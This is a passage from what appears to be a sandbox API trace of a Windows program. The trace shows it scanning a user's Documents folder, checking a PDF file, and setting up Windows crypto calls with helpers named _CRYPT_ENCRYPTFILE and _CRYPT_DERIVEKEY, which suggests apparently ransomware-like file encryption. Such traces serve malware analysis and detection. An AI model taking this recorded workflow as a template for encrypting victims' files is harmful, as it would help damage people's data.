dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="biNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.285] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0173.285] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0173.285] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0173.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0173.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0173.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0173.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0173.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0173.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0173.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0173.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0173.286] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.286] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0173.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0173.286] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb702510, ftCreationTime.dwHighDateTime=0x1d5d9dc, ftLastAccessTime.dwLowDateTime=0x2ad3e090, ftLastAccessTime.dwHighDateTime=0x1d5dc0a, ftLastWriteTime.dwLowDateTime=0x2ad3e090, ftLastWriteTime.dwHighDateTime=0x1d5dc0a, nFileSizeHigh=0x0, nFileSizeLow=0xce08, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="XdF9hOa.pdf", cAlternateFileName="")) returned 0x90af58 [0173.286] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0173.286] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0173.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0173.286] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.286] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.287] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.287] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.287] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0173.287] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0173.287] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.287] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.287] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0173.287] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.287] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.287] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0173.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0173.287] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0173.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0173.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0173.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.288] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.288] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0173.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0173.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.288] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0173.289] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.289] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.289] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0173.289] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.290] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.290] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.290] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.290] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.290] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.290] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.290] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.290] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.290] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0173.290] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.290] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.290] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0173.290] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0173.290] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.291] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.291] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.291] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.291] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0173.291] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.291] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.291] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.291] PeekMessageW (in: 